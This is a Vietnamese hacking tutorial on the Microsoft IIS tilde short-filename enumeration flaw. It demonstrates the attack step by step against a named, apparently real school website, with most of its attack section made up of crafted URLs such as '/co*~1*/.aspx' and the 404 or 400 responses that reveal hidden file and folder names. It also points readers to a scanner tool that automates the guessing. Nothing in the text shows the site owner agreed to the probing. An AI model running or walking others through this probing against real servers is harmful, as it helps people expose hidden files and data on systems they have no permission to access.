--> Skip to main content

[TUT] - Khai thác lỗi Microsoft IIS tilde character ~

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"Attack details:
Demo trên site http://hp-aptech.edu.vn

Đầu tiên ta sẽ kiểm tra chữ cái đầu tiên trong tên các file hay folder. Nếu chữ cái đó tồn tại thì sẽ nhận được 1 response 404 - File Not Found. Còn nếu không tồn tại chữ cái đó thì sẽ nhận được 1 response 400 - Bad Request

Bắt đầu thử với link sau:
http://hp-aptech.edu.vn/a*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/b*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/c*~1*/.aspx- -> 404 => Có tồn tại
………
http://hp-aptech.edu.vn/f*~1*/.aspx ->400 Bad request=> Không tồn tại

Giờ ta sẽ thử với chữ cái thứ 2:
http://hp-aptech.edu.vn/ca*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cb*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cc*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/co*~1*/.aspx ->404 =>Có tồn tại

Tiếp tục với những chữ cái tiếp theo:
http://hp-aptech.edu.vn/coa*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cob*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/con*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/com*~1*/.aspx -> 404 => Có tồn tại
Cú tiếp tục đoán tiếp nhé
Muốn khai thác thành công kiểu lỗi này phụ thuộc nhiều yếu tố
+Website chạy IIS
+Có khả năng đoán folder,file..-> đoán file thần chưởng
+ Khi mà tìm được folder,file phải có quyền truy cập đến
+Folder,file tìm được có dữ liệu quan trọng
……...
Cụ thể muốn tìm hiểu lỗi này vào đây. Trong đây có tool sẽ giảm thiểu thời gian cho các bạn phải đoán folder,file. Muốn chạy được tool này phải cài java.
http://code.google.com/p/iis-shortname-scanner-poc/

Tut by kakavn_85

Share